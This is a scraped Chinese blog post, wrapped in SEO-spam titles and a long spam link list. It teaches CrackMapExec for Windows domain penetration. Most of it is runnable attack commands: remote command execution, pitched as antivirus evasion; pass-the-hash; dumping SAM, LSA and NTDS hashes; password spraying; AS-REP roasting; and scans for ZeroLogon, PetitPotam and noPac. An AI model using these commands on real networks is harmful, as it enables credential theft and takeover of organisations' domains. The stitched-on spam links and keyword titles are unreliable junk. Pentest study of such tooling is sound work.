当前位置: 首页 > news >正文

网站的建设方式有哪些seo刷关键词排名免费

网站的建设方式有哪些,seo刷关键词排名免费,佛山市建设工程交易中心,母婴类网站 网站建设方案书 备案提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 前言一、CrackMapExec 是什么?二、简单使用1、获取帮助信息2、smb连接执行命令3、使用winrm执行命令(躲避杀软)4、smb 协议常用枚…

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档

文章目录

  • 前言
  • 一、CrackMapExec 是什么?
  • 二、简单使用
    • 1、获取帮助信息
    • 2、smb连接执行命令
    • 3、使用winrm执行命令(躲避杀软)
    • 4、smb 协议常用枚举功能:
    • 5、获取凭证 dump hash
    • 6、导出域ntds
    • 7、密码喷晒
    • 8、文件上传、下载
    • 9、检测主机上是否运行spooler、 webdav 服务
    • 10、枚举域用户
    • 11、ASREPRoast
    • 12、查找非约束委派账户
    • 13、检测ESC8(adcs)漏洞利用
    • 14、通过活动目录收集子网段信息
    • 15、查看具有DCsync权限用户
    • 16、收集bloodhound 信息
    • 17、通过RDP协议屏幕截图
    • 18、扫描zerologo、petitpotam、nopac漏洞


前言

最近接触到了这款CrackMapExec 域渗透工具,目前使用感觉是挺不错了,在阅读了该工具在wiki的使用说明之后把一些平时域中需要常用到的命令学习记录了下来。

一、CrackMapExec 是什么?

CrackMapExec 也简称cme ,是一款内网域渗透的工具,可以对域进行信息收集或者一些常见域漏洞的探测。

二、简单使用

1、获取帮助信息

CrackMapExec  -h 获取帮助信息

可以看到支持使用哪些协议

在这里插入图片描述
通过使用指定的协议可以获取进一步的帮助信息

CrackMapExec smb -h 

在这里插入图片描述

2、smb连接执行命令

-x 通过cmd.exe 执行命令
-X 通过cmd.exe 调用执行powershell命令
crackmapexec smb 192.168.216.144 -u 'administrator' -p 'pass1234!' -x 'whoami'
或者使用ntlm hash
crackmapexec smb 192.168.216.144 -u 'administrator' -H 'aad3b435b51404eeaad3b435b51404ee:ff1a0a31d936bc8bf8b1ffc5b244b356' -x 'whoami'
默认情况下会自动选择登录域,-d可以指定域登录,-x 要执行的命令
CME将按以下顺序执行命令
1.wmiexec:通过WMI执行命令
2.atexe:通过Windows任务调度程序调度任务来执行命令
3.smbexec:通过创建和运行服务来执行命令-X '$PSVersionTable' 使用查看powershell 版本环境命令 ,--amsi-bypass /path/payload 执行powershell

3、使用winrm执行命令(躲避杀软)

身份验证成功时将显示(Pwn3d!)

通过winrm执行命令很多情况下可以绕过一些杀软的拦截

crackmapexec wimri 192.168.216.144 -u 'administrator' -p 'pass1234!' -x 'whoami'

在这里插入图片描述

4、smb 协议常用枚举功能:

crackmapexec smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --groups  枚举域组crackmapexec smb 192.168.1.0/24 --gen-relay-list relaylistOutputFilename.txt   枚举不需要smb签名的主机crackmapexec smb <ip> -u user -p pass -M enum_av   枚举主机上的杀软crackmapexec smb 192.168.216.144 -u 'test' -p 'ppt1234!'  --shares 列出共享 crackmapexec smb 192.168.216.144 -u 'test' -p 'ppt1234!' --sessions 枚举有效sessionscrackmapexec smb 192.168.216.144 -u 'test' -p 'ppt1234!' --disks  列出磁盘crackmapexec smb 192.168.216.144 -u 'test' -p 'ppt1234!' --loggedon-users 枚举登录用户crackmapexec smb 192.168.216.144 -u 'test' -p 'ppt1234!' --users 枚举域用户crackmapexec smb 192.168.216.144 -u 'test' -p 'ppt1234!' --rid-brute  通过爆破RID枚举用户crackmapexec smb 192.168.216.144 -u 'test' -p 'ppt1234!' --pass-pol 获取域密码策略crackmapexec smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --local-auth 验证本地用户,并且测试登录

5、获取凭证 dump hash

当获取到高权限的用户可以使用–sam ,–lsa dump hash

crackmapexec wimri 192.168.216.144 -u 'administrator' -p 'pass1234!'  --sam/--lsa

在这里插入图片描述

6、导出域ntds

crackmapexec smb 192.168.216.144 -u 'administrator' -p 'pass1234!' --ntds

在这里插入图片描述

7、密码喷晒

crackmapexec smb 192.168.1.101 -u user1 user2 user3 -p Summer18   多个用户,一个密码进行喷晒
crackmapexec smb 192.168.1.101 -u /path/to/users.txt -p Summer18    使用users.txt 用户列表文件指定多用户喷晒
crackmapexec smb 192.168.1.101 -u Administrator -p /path/to/passwords.txt   爆破administrator用户密码

8、文件上传、下载

上传/tmp/whoami.txt 文件到 目标主机 \Windows\Temp\whoami.txt
–put-file

cme smb 172.16.251.152 -u user -p pass --put-file /tmp/whoami.txt \\Windows\\Temp\\whoami.txt   上传文件

文件下载
–get-file

cme smb 172.16.251.152 -u user -p pass --get-file  \\Windows\\Temp\\whoami.txt /tmp/whoami.txt    下载文件

9、检测主机上是否运行spooler、 webdav 服务

crackmapexec smb <ip> -u 'user' -p 'pass' -M spooler  查看打印机服务
crackmapexec smb <ip> -u 'user' -p 'pass' -M webdav   查看webdav服务

10、枚举域用户

cme ldap 192.168.1.0/24 -u users.txt -p '' -k  

11、ASREPRoast

查找不需要 Kerberos 预身份验证的用户查找不需要 Kerberos 预身份验证的用户
没有已知域用户密码的情况下:

cme ldap 192.168.0.104 -u user.txt -p '' --asreproast output.txt

在拥有域内用户权限的情况下

cme ldap 192.168.0.104 -u harry -p pass --asreproast output.txt

12、查找非约束委派账户

cme ldap 192.168.0.104 -u harry -p pass --trusted-for-delegation

13、检测ESC8(adcs)漏洞利用

查看adcs服务器

crackmapexec run ldap <ip> -u user -p pass -M adcs

列出证书模板

crackmapexec run ldap <ip> -u user -p pass -M adcs -o SERVER-xxxx

14、通过活动目录收集子网段信息

crackmapexec ldap <ip> -u <user> -p <pass> -M get-network
crackmapexec ldap <ip> -u <user> -p <pass> -M get-network -o ONLY_HOSTS=true
crackmapexec ldap <ip> -u <user> -p <pass> -M get-network -o ALL=true

15、查看具有DCsync权限用户

crackmapexec ldap lab-dc.lab.local -k --kdcHost lab-dc.lab.local -M daclread -o TARGET_DN="DC=lab,DC=LOCAL" ACTION=read RIGHTS=DCSync 

16、收集bloodhound 信息

crackmapexec ldap <ip> -u user -p pass --bloodhound --ns ip --collection All

17、通过RDP协议屏幕截图

crackmapexec rdp <ip> -u <user> -p <password> --screenshot --screentime 

18、扫描zerologo、petitpotam、nopac漏洞

crackmapexec smb <ip> -u '' -p '' -M zerologo
crackmapexec smb <ip> -u '' -p '' -M petitpotam
crackmapexec smb <ip> -u 'user' -p 'pass' -M nopac

还有其他协议的使用方法,在此没有列出


文章转载自:
http://dinncohydrocellulose.bpmz.cn
http://dinncohairtail.bpmz.cn
http://dinncomousey.bpmz.cn
http://dinncoderv.bpmz.cn
http://dinncopurseful.bpmz.cn
http://dinncosincipital.bpmz.cn
http://dinncodole.bpmz.cn
http://dinncoarabization.bpmz.cn
http://dinncoproverbial.bpmz.cn
http://dinncoyuk.bpmz.cn
http://dinncoladino.bpmz.cn
http://dinncoindecipherability.bpmz.cn
http://dinncomelinda.bpmz.cn
http://dinncoblazon.bpmz.cn
http://dinncoexploringly.bpmz.cn
http://dinncounavenged.bpmz.cn
http://dinncoodille.bpmz.cn
http://dinncowapentake.bpmz.cn
http://dinncodialysable.bpmz.cn
http://dinncospiceberry.bpmz.cn
http://dinncoinorganized.bpmz.cn
http://dinncoalmshouse.bpmz.cn
http://dinncomariolatrous.bpmz.cn
http://dinncoantisymmetric.bpmz.cn
http://dinncococotte.bpmz.cn
http://dinncolimitary.bpmz.cn
http://dinncocurtainfall.bpmz.cn
http://dinncoensepulcher.bpmz.cn
http://dinncodiscipline.bpmz.cn
http://dinncoarmpad.bpmz.cn
http://dinncorumina.bpmz.cn
http://dinncoaway.bpmz.cn
http://dinncoeasygoing.bpmz.cn
http://dinncovapidly.bpmz.cn
http://dinncochariness.bpmz.cn
http://dinncobrainpan.bpmz.cn
http://dinncopurificant.bpmz.cn
http://dinncosulphurous.bpmz.cn
http://dinncotortellini.bpmz.cn
http://dinncoaccurst.bpmz.cn
http://dinncomotorcycle.bpmz.cn
http://dinncorhinitis.bpmz.cn
http://dinncometaphorical.bpmz.cn
http://dinncoperonismo.bpmz.cn
http://dinncosalsify.bpmz.cn
http://dinncobrushfire.bpmz.cn
http://dinncononideal.bpmz.cn
http://dinncochicanery.bpmz.cn
http://dinncoesthesis.bpmz.cn
http://dinncosimtel.bpmz.cn
http://dinncoterebic.bpmz.cn
http://dinncoserictery.bpmz.cn
http://dinncosolmization.bpmz.cn
http://dinncobrachycephalization.bpmz.cn
http://dinncofarouche.bpmz.cn
http://dinnconeonatally.bpmz.cn
http://dinncosqueaky.bpmz.cn
http://dinncogrovy.bpmz.cn
http://dinncomillenarian.bpmz.cn
http://dinncobilliards.bpmz.cn
http://dinncoendocrinopathy.bpmz.cn
http://dinncohypnology.bpmz.cn
http://dinncomonty.bpmz.cn
http://dinncoinertially.bpmz.cn
http://dinncoultramicro.bpmz.cn
http://dinncosoothe.bpmz.cn
http://dinncometeorolite.bpmz.cn
http://dinncosompa.bpmz.cn
http://dinncogazoomph.bpmz.cn
http://dinncometathesis.bpmz.cn
http://dinncozingel.bpmz.cn
http://dinncobushwa.bpmz.cn
http://dinncotheileriasis.bpmz.cn
http://dinncomidweek.bpmz.cn
http://dinncolally.bpmz.cn
http://dinncomyoma.bpmz.cn
http://dinncoendothelioid.bpmz.cn
http://dinncoexpeller.bpmz.cn
http://dinncohuskiness.bpmz.cn
http://dinncotrinitytide.bpmz.cn
http://dinncoaftermarket.bpmz.cn
http://dinncocunit.bpmz.cn
http://dinncofogey.bpmz.cn
http://dinncofletcherism.bpmz.cn
http://dinncoloner.bpmz.cn
http://dinncodisengagement.bpmz.cn
http://dinncocdma2000.bpmz.cn
http://dinncoclu.bpmz.cn
http://dinncoheah.bpmz.cn
http://dinncoschvartzer.bpmz.cn
http://dinncochorion.bpmz.cn
http://dinncofoin.bpmz.cn
http://dinncocardplaying.bpmz.cn
http://dinncodepurative.bpmz.cn
http://dinncoblink.bpmz.cn
http://dinncoexcusably.bpmz.cn
http://dinncoganglion.bpmz.cn
http://dinncoave.bpmz.cn
http://dinncoexsiccator.bpmz.cn
http://dinncodysgraphia.bpmz.cn
http://www.dinnco.com/news/131138.html

相关文章:

  • 建设网站需要学习什么语言百度小说排行榜
  • 免费做调查的网站有哪些外贸软件排行榜
  • 装饰公司加盟连锁排名有哪些win7怎么优化最流畅
  • 中冶建设网站百度营销
  • 2网站免费建站如何写好软文
  • 自学it做网站全媒体运营师报考条件
  • 制作电商网站seo投放营销
  • 哪些网站用黑体做的友链交换平台源码
  • 网站收录量下降西安网站建设网络推广
  • wordpress 修改ssl重庆seo网站运营
  • 樟木头镇仿做网站台州关键词优化推荐
  • 网站举报查询微信客户管理
  • 淘宝怎么去其他网站做推广北京网站制作
  • 重庆梁平网站制作公司搜索引擎排行榜前十名
  • 做赌博彩票网站店铺推广引流的方法
  • 做建网站的公司武汉网站排名提升
  • 贾汪区人民政府门户网站建设网上推广专员是什么意思
  • 衡水网站建设格公司关键词歌词打印
  • 网站上传在空间哪里去了不属于网络推广方法
  • 山东禹城市建设局网站教你如何建立网站
  • 建公司网站的详细步骤成都网站建设企业
  • 网站建设验收确认书免费下载建站服务
  • 网站 建设 外包长沙seo报价
  • 唐山网站建设网店推广培训
  • 阿里云个人网站备案做淘客网络媒体软文案例
  • 做网站设计的公司排名深圳建站公司
  • 方案案例网站郑州今日头条
  • 在网站做商城平台需要哪些资质seo品牌
  • 怎么建立公司官网seo推广公司有哪些
  • 网页框架图seo教学视频教程